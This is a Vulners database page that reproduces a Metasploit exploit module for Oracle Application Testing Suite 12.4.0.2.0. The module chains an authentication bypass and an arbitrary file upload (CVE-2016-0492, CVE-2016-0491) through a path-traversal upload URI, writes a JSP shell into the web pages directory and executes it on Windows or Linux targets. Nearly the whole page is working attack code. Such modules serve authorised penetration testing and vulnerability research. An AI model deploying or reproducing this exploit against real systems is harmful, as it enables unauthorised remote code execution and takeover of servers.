Vulners
Lucene search
Oracle ATS Arbitrary File Upload
🗓️ 26 Apr 2016 20:41:27Reported by Zhou Yu, wvu <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 22 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle ATS Arbitrary File Upload',
'Description' => %q{
This module exploits an authentication bypass and arbitrary file upload
in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
unknown earlier versions, to upload and execute a JSP shell.
},
'Author' => [
'Zhou Yu', # Proof of concept
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-0492}, # Auth bypass
%w{CVE 2016-0491}, # File upload
%w{EDB 39691} # PoC
],
'DisclosureDate' => '2016-01-20',
'License' => MSF_LICENSE,
'Platform' => %w{win linux},
'Arch' => ARCH_JAVA,
'Privileged' => true,
'Targets' => [
['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'],
['OATS <= 12.4.0.2.0 (Linux)', 'Platform' => 'linux']
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8088)
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/admin/Login.do'
)
if res && res.body.include?('12.4.0.2.0')
CheckCode::Appears
else
CheckCode::Safe
end
end
def exploit
print_status("Uploading JSP shell to #{jsp_path}")
upload_jsp_shell
print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
exec_jsp_shell
end
def upload_jsp_shell
mime = Rex::MIME::Message.new
mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"')
mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"')
mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed
mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed
mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed
mime.add_part('*', nil, nil, 'form-data; name="fileType"')
mime.add_part(payload.encoded, 'text/plain', nil,
%Q{form-data; name="file1"; filename="#{jsp_filename}"})
mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"')
mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
register_file_for_cleanup(jsp_path)
send_request_cgi(
'method' => 'POST',
'uri' => '/olt/Login.do/../../olt/UploadFileUpload.do',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def exec_jsp_shell
send_request_cgi(
'method' => 'GET',
'uri' => "/olt/pages/#{jsp_filename}"
)
end
def jsp_directory
case target['Platform']
when 'win'
'..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages'
when 'linux'
'../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages'
end
end
def jsp_filename
@jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
end
def jsp_path
jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2019 17:35Current
0.4Low risk
Vulners AI Score0.4